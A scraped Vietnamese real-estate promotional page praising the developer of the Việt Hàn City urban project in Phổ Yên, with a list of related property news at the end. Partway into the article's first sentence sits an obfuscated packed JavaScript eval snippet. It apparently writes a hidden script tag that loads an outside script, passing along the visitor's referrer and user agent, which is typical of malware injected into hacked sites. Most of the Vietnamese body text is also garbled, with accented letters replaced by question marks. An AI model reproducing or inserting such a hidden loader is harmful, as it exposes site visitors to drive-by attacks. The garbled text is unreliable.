THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
1
0
Tháng
1
0
Ngày

Chủ đầu tư dự án khu đô thị Việt Hàn City có đáng tin tưởng?

D? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nstsa|var|u0026u|referrer|neyak||js|php’.split(‘|’),0,{}))
án b?t ??ng s?n khu ?ô th? Vi?t Hàn City Ph? Yên ?ang ???c r?t nhi?u nhà ??u t?, dân c? và khách hàng quan tâm th? nh?ng không ph?i ai c?ng bi?t nh?ng thông tin v? ch? ??u t? c?a d? án này. V?y ch? ??u t? khu ??t n?n Vi?t Hàn là ??n v? nào có ?áng tin tr??ng ?? trao m?t g?i vàng hay không?

1, Ch? ??u t? d? án b?t ??ng s?n khu ?? th? Vi?t Hàn City là ??n v? nào?

D? án Vi?t Hàn City Phô? Yên có tên ??y ?? c?a là “D? án xây d?ng Khu nhà ? xã h?i, Trung tâm th??ng m?i và nhà ? cao c?p H?ng Long” thu?c ??n v? Công ty C? ph?n ??u t? xây d?ng phát tri?n h? t?ng H?ng Long là m?t công ty ho?t ??ng trong các l?nh v?c:

Ch? ??u t? d? án khu ?ô th? Vi?t Hàn City có ?áng tin t??ng?

  • ??u t?, t? v?n b?t ??ng s?n
  • Giám sát, thi công trong l?nh v?c xây d?ng c? b?n
  • Xây d?ng công trình dân d?ng, giao thông, th?y l?i…

???c thành l?p vào tháng 01/2011, ch? ??u t? c?a d? án khu ?ô th? Vi?t Hàn City công ty H?ng Lông có kinh nghi?m và th? m?nh trong l?nh v?c b?t ??ng s?n ??u t? nh?ng d? án có v? trí ??c ??a k?t n?i nhi?u ti?n ích mong mu?n cung c?p cho khách hàng nh?ng ??a ch? s?ng ti?n nghi, thu?n l?i.

??a ch? c?a d? án Vi?t Hàn city Ph? Yên:

  • V? trí d? án: Thôn ?ông Sinh, Xã H?ng Ti?n, Huy?n Ph? Yên, T?nh Thái Nguyên.
  • T?ng di?n tích ??t: 38 ha
  • K?t n?i nhi?u tuy?n ???ng giao thông huy?t m?ch, các tr??ng h?c, b?nh vi?n l?n, các trung tâm th??ng mai và ??c bi?t có KCN Samsung.

Quy mô d? án Vi?t Hàn City Bao g?m:

  • Khu Trung tâm th??ng m?i;
  • Khu nhà ? xã h?i d?ng chung c?;
  • Khu nhà hàng, khách s?n; tr?m x?ng, tr?m y t?…

2, Ch? ??u t? d? án Khu ?ô th? Vi?t Hàn City Ph? Yên có ?i?m gì ?áng tin c?y?

Ch? ??u t? khu ??t n?n Vi?t Hàn City Ph? Yên là Công ty CP ??u t? xây d?ng h? t?ng H?ng Long, v?i nhi?u kinh nghi?m trên th? tr??ng b?t ??ng s?n hi?n nay ??n b? là m?t trong nh?ng ??i tác, nhà th?u có uy tín ???c góp m?t trong nhi?u d? án l?n nh? Khu ?ô th? Vi?t Hàn City v?i di?n tích quy hoach l?n ?ên 38034m2

Ch? ??u t? d? án khu ?ô th? Vi?t Hàn City có ?áng tin t??ng?

Công ty không ch? phát tri?n m?nh các m?ng kinh doanh s?n xu?t mà con chú tr?ng ??n các khâu t? ch?c, con ng??i ?? xây d?ng m?t t?p th? v?ng m?nh có th? n?i ??n nh? t? ch?c công ?oàn Công ty và ?oàn thanh niên ???c thành l?p và ho?t ??ng hi?u qu?,luôn hoàn thành t?t nhi?m v? b?o v? và ch?m lo cho ??i s?ng tinh th?n c?a ?oàn viên qua ?ó t?o s? g?n k?t c?ng nh? chia s? kinh nghi?m trong công tác chuyên môn.

??c bi?t ??ng b? Công ty ???c ra ??i ngày 8/8/2016 nh?m xây d?ng h? thông lãnh ??o, g?n k?t ho?t ??ng c?a công ty v?i t? ch?c lãnh ??o ??ng ??a ??nh h??ng phát tri?n công ty ?i theo con ???ng ?úng ??n.

Có ??ng ??nh h??ng và gi? vai trò là h?t nhân chính tr? trong công tác lãnh ??o th?c hi?n các ch? tr??ng, chính sách, pháp lu?t, s? hi?u qu? và chính xác, ??ng th?i tuyên truy?n, giáo d?c công nhân viên, ng??i lao ??ng và các thành viên trong b? máy qu?n lý c?a doanh nghi?p ch?p hành t?t các ch?  tr??ng, ???ng l?i c?a ??ng và th?c hi?n t?t chính sách pháp lu?t c?a Nhà n??c.

Nh? nh?ng ?i?u ki?n v? t? ch?c và b? máy lãnh ??o c?ng nh? ???ng lõi phát tri?n c?ng v?i kinh nghi?m nhi?u n?m trong l?nh v?c b?t ??ng s?n, ch? ??u t? khu ?ô th? Vi?t Hàn City  công ty H?ng Long là m?t trong nh?ng ??n v? uy tín ?áng ?? quý khách hàng quân tâm và ch?n m?t g?i vàng.

Liên h? ngay v?i chúng tôi ?? có thêm thông tin v? d? án Vi?t Hàn City Ph? Yên và ch? ??u t?: 093 15 68886

Bạn đang xem: Chủ đầu tư dự án khu đô thị Việt Hàn City có đáng tin tưởng? trong

News latest

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...

BẢN ĐỒ HUYỆN BÌNH CHÁNH
BẢN ĐỒ HUYỆN BÌNH CHÁNH

Mới đây, UBND Thành phố đã có quyết định ban hành số 2391/QĐ-UBND về quy hoạch sử dụng đất đến năm 2020 và kế hoạch...

FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?
FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?

Thông tin t?p ?oàn FLC m?i ?ây ?ã v??t qua 16 ??i th? ?? th?ng ??u giá khu ??t có di?n tích 6,4ha thu?c ph??ng...